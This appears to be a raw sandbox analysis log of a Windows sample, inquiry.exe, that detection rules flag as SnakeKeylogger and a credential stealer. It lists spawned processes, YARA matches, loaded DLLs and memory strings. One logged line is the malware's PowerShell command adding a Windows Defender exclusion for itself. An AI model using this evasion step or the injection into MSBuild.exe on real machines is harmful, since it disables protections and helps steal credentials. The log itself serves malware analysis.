Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CF1B9	10_2_054CF1B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C0040	10_2_054C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CE068	10_2_054CE068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CE067	10_2_054CE067
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CDC01	10_2_054CDC01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CDC10	10_2_054CDC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C003F	10_2_054C003F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CE4C0	10_2_054CE4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CE4B2	10_2_054CE4B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CD360	10_2_054CD360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CCF08	10_2_054CCF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C0B20	10_2_054C0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C0B30	10_2_054C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C1B97	10_2_054C1B97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C1BA8	10_2_054C1BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CD7A8	10_2_054CD7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CD7B8	10_2_054CD7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C9E69	10_2_054C9E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CFA6A	10_2_054CFA6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CFA78	10_2_054CFA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C2278	10_2_054C2278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C8E08	10_2_054C8E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C5201	10_2_054C5201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CF610	10_2_054CF610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CF620	10_2_054CF620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054CCEF7	10_2_054CCEF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_054C2288	10_2_054C2288

Source: C:\Users\user\Desktop\inquiry.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312

Source: inquiry.exe

Static PE information: No import functions for PE file found

Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs inquiry.exe
Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOcumukahaqufef4 vs inquiry.exe
Source: inquiry.exe, 00000002.00000000.1270151909.000001F8698D0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTransponer.exe6 vs inquiry.exe
Source: inquiry.exe	Binary or memory string: OriginalFilenameTransponer.exe6 vs inquiry.exe

Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: inquiry.exe, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@5/4

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p01ppd1y.4mi.ps1

Jump to behavior

Source: inquiry.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: inquiry.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\inquiry.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: inquiry.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\inquiry.exe

File read: C:\Users\user\Desktop\inquiry.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\inquiry.exe "C:\Users\user\Desktop\inquiry.exe"
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
